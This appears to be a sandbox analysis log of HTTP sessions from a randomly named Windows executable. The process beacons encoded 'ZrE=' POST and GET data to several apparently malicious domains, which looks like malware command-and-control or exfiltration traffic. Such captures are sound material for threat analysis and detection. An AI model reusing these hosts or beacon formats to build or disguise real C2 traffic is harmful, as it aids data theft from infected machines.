12 | 192.168.2.6 | 49947 | 104.21.31.249 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:41.541641951 CET | 845 | OUT | POST /j82t/ HTTP/1.1
                                                                                                                                                        Host: www.aaavvejibej.bond
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.aaavvejibej.bond
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.aaavvejibej.bond/j82t/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=Ad+3ASsryumtgE6ALUIZKmHorGJxQFdRaIPyadsXZyB3TyjQAq/7A1ynUOt+FYxHeieuNixhQ7hID4DJy6Q1xPlitsajY7ODb+1ibACO8Xu/RP87N9Ocu0e0VB9RlAOvD/7SyFRue/FWI7Z7C4Kqqj0xIcuONqtazWmA6s7pAbPvrMiyWyHBVgYuCX2cYnrBiFd8fS6xO4jbZrTBgR1+OF69jM/sTiYIXg==
Dec 5, 2024 05:39:43.087548018 CET | 780 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:39:42 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5aRWO3lyegZHnrVPSHS2Ht4PApE138vIrU3wpUkz%2BS7V%2FYzAUo4Tp9w3VkjqK21sxqV83AwOWxlSWSYvUSNGjZiV6zoSpDMrdgIseKS%2BTMsK3D5zdj1AZQW6W0213hzEq7%2FvZ6X5gw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8ed15a9a6c1242bc-EWR
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1596&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=845&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                        Data Raw: 33 0d 0a 34 30 34 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 34040


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49955 | 104.21.31.249 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:44.201124907 CET | 1858 | OUT | POST /j82t/ HTTP/1.1
                                                                                                                                                        Host: www.aaavvejibej.bond
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.aaavvejibej.bond
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.aaavvejibej.bond/j82t/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 5, 2024 05:39:45.746464014 CET | 779 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:39:45 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tkesf%2Bb6DY5Vr824dT3podnAxUrp8CL5bPqRlKMBReQrpZzw6Wb6IBL3IL7qv5wbYQmxajLjZJKs5Ku02RrnO7C%2BArWHrYPCP%2Flma1Nm7NJrizqpAA3kaE2w03SZPQR9s3kCujKSaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8ed15aab098843ac-EWR
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1760&rtt_var=880&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1858&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                        Data Raw: 33 0d 0a 34 30 34 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 34040


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49963 | 104.21.31.249 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:46.863574028 CET | 552 | OUT | GET /j82t/?ZrE=NfWXDnAQh5K3pnOvM14VTy+amnJPckA/Yfv/BKk9TV5fOF3SI/PjO3S5UMxnHoxUaRbUJGZsTsQcLMza5Yog8fRAodWufvWEXO0cDD2ch1ehULAsaf2d9mbkKApg9S+Ve9CxlSo=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.aaavvejibej.bond
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 5, 2024 05:39:48.442142010 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:39:48 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rI0tjnFbErdmpJUS4HVz9oEnNtVL6kmpe84qPBaC2ALKfYYXqbdRoCOLm368heIrmkoOSuspmpYY4DXYhB6sDk9nGLRYunOi%2BQAeDyNIXLKTcVi7LYJ0GnHxxKPJT11rJOKlOHo64g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8ed15abbb8778c45-EWR
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1800&rtt_var=900&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=552&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                        Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a
Dec 5, 2024 05:39:48.442178011 CET | 68 | IN | Data Raw: 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49977 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:54.214792013 CET | 833 | OUT | POST /lrgf/ HTTP/1.1
                                                                                                                                                        Host: www.deikamalaharris.info
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.deikamalaharris.info
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.deikamalaharris.info/lrgf/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=sJNaLCS+5K5JroC/VJEOhGsHszvbZgGZnAqF82nXJqKqNpBPRy0sJfKPol1saT///LbrP5XLHJdREwOVwEn7eJKnQjZfy/Pu0/0NoSK3QlZ+f5Nubg6Kpu2nu+7wHGIK0JOs1Bu0x5FLuDs4BWUbxBEpO1My8vNfkje49DZFk8myoCBxGKXpJahMbnoDMBPKiSCWkE+lhF46


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49984 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:56.877975941 CET | 857 | OUT | POST /lrgf/ HTTP/1.1
                                                                                                                                                        Host: www.deikamalaharris.info
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.deikamalaharris.info
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.deikamalaharris.info/lrgf/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=sJNaLCS+5K5JrLq/G4EOwmsApzvbXwHQnAWF8yXHJZ+qMNFPQz0sIfKPnF1teT/4/LWeP4rLHJZRE1iVwX/6eZKhYDYZxPPu0/0NoSuJQlR+fJ9uZB6Jqu24v+7wDGIO0JO01FOOx/BLuBE4BHUYoREvDVN16+Mvui/B9VFg9e23p0Ara5XKbKBOblwxMhPggS6W2TyCuxdZiunez6LqQAK5EztKAo3MYA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49991 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:59.533998013 CET | 1870 | OUT | POST /lrgf/ HTTP/1.1
                                                                                                                                                        Host: www.deikamalaharris.info
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.deikamalaharris.info
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.deikamalaharris.info/lrgf/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


Session ID: 18 | Source IP: 192.168.2.6 | Source Port: 49999 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3992 | Process: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp: Dec 5, 2024 05:40:02.195569992 CET | Bytes transferred: 556 | Direction: OUT | Data:
GET /lrgf/?ZrE=hLl6Iyyv1/RGmZWnRJ8bmiMJmTP6dhK4gm2wi1fTCYCBRK5IakRwGOHrv3dZYUH5yIXieuiAG/czDQPLmWqEbLilSzY96+fF8eVAog2wOE9edOY1dT6GtuOhq9bHDkAhjeaZiB4=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.deikamalaharris.info
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Timestamp: Dec 5, 2024 05:40:03.278789043 CET | Bytes transferred: 406 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:03 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 266
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZrE=hLl6Iyyv1/RGmZWnRJ8bmiMJmTP6dhK4gm2wi1fTCYCBRK5IakRwGOHrv3dZYUH5yIXieuiAG/czDQPLmWqEbLilSzY96+fF8eVAog2wOE9edOY1dT6GtuOhq9bHDkAhjeaZiB4=&Jr=tnaxxtx"}</script></head></html>


Session ID: 19 | Source IP: 192.168.2.6 | Source Port: 50005 | Destination IP: 162.213.249.216 | Destination Port: 80 | PID: 3992 | Process: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp: Dec 5, 2024 05:40:08.918059111 CET | Bytes transferred: 815 | Direction: OUT | Data:
POST /vfa8/ HTTP/1.1
                                                                                                                                                        Host: www.tophcom.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.tophcom.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.tophcom.online/vfa8/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=/RrkgnNt3QCtMfjlbZgVnkAPb2peduddPEMGB2rzarldmO62jOgHnlyA1V3m0riXqpK9cFOf7iCsQUVQRhSi3tgBho4FPgEkEPklPLzDMJjVMU2rICo/14h7i7BdcPtfc4jiGRezmD8glIjQW939/O5fyXwsJ5vM+5SyzjpJKCfvSztS1Kfm5GH6oX/d8rbgGFvrtOx9cTQg
Timestamp: Dec 5, 2024 05:40:10.150129080 CET | Bytes transferred: 533 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:09 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Content-Length: 389
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 20 | Source IP: 192.168.2.6 | Source Port: 50006 | Destination IP: 162.213.249.216 | Destination Port: 80 | PID: 3992 | Process: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp: Dec 5, 2024 05:40:11.577081919 CET | Bytes transferred: 839 | Direction: OUT | Data:
POST /vfa8/ HTTP/1.1
                                                                                                                                                        Host: www.tophcom.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.tophcom.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.tophcom.online/vfa8/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=/RrkgnNt3QCterflLO0VlEAQHmpeK+c1PEAGB3/jae9dmq+2iPgHmlyAtF3vwriIqpXecAuf7i+sQUFQRSqhlNgDuI4DSQEkEPklPPbpMNPVPn+rJnU+/Yh40rBdKPtbc4jMGTrmmBUglK7QWvf+x+5Z2XxNF5Ga26XKyBokegrlTFsIp5fFrWn4oVnv8LbKEFXr/Z9aTn1DfIDZAbXyAMdj59tPJba83g==
Timestamp: Dec 5, 2024 05:40:12.810494900 CET | Bytes transferred: 533 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:12 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Content-Length: 389
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 21 | Source IP: 192.168.2.6 | Source Port: 50008 | Destination IP: 162.213.249.216 | Destination Port: 80 | PID: 3992 | Process: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp: Dec 5, 2024 05:40:14.234867096 CET | Bytes transferred: 1852 | Direction: OUT | Data:
POST /vfa8/ HTTP/1.1
                                                                                                                                                        Host: www.tophcom.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.tophcom.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.tophcom.online/vfa8/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: ZrE= [TRUNCATED]
Timestamp: Dec 5, 2024 05:40:15.691303015 CET | Bytes transferred: 533 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:15 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Content-Length: 389
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 22 | Source IP: 192.168.2.6 | Source Port: 50009 | Destination IP: 162.213.249.216 | Destination Port: 80 | PID: 3992 | Process: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp: Dec 5, 2024 05:40:16.892879009 CET | Bytes transferred: 550 | Direction: OUT | Data:
GET /vfa8/?ZrE=yTDEjSVS0lCRYcLIcrIR3TcCYEVKOYUzZB0jcnDiZYtjnJOoqq5Z+2u71ELG2uGtiKDGExTS3yLoYSdFQgyUiMInkJIsAAFuKMZReKrfZcHWOCruByZu1/Jk+op4CslnIJH3FWE=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.tophcom.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Timestamp: Dec 5, 2024 05:40:18.370517015 CET | Bytes transferred: 548 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:18 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Content-Length: 389
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 23 | Source IP: 192.168.2.6 | Source Port: 50010 | Destination IP: 62.149.128.40 | Destination Port: 80 | PID: 3992 | Process: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp: Dec 5, 2024 05:40:24.001055956 CET | Bytes transferred: 824 | Direction: OUT | Data:
POST /obbp/ HTTP/1.1
                                                                                                                                                        Host: www.chalet-tofane.net
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.chalet-tofane.net
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.chalet-tofane.net/obbp/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=n+GYn1joGIvl/P9/a+z2y1Po09Oj3ZPuXqMDeW+PyChk6so8N53pR4c+KXhfjESFejNviOkpFP1EyHg8hFqXWF2eyj5RY0iXn9YStBjKGdkN1oTGS2gAFvePAE6WF9ArMbbJf5SUwi1vEjtAaax9McWVOi4i2gJXu/W1Z7apoYc+q6Im/D4W5MRHKj5So5zOJX5gtLqcwnqU
Dec 5, 2024 05:40:25.293838978 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        Cache-Control: private
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:25 GMT
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Length: 4953
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Dec 5, 2024 05:40:25.293853998 CET | 1236 | IN
                                                                                                                                                        Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
Dec 5, 2024 05:40:25.293864965 CET | 1236 | IN
                                                                                                                                                        Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
Dec 5, 2024 05:40:25.293879986 CET | 1236 | IN
                                                                                                                                                        Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
Dec 5, 2024 05:40:25.293890953 CET | 228 | IN
                                                                                                                                                        Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


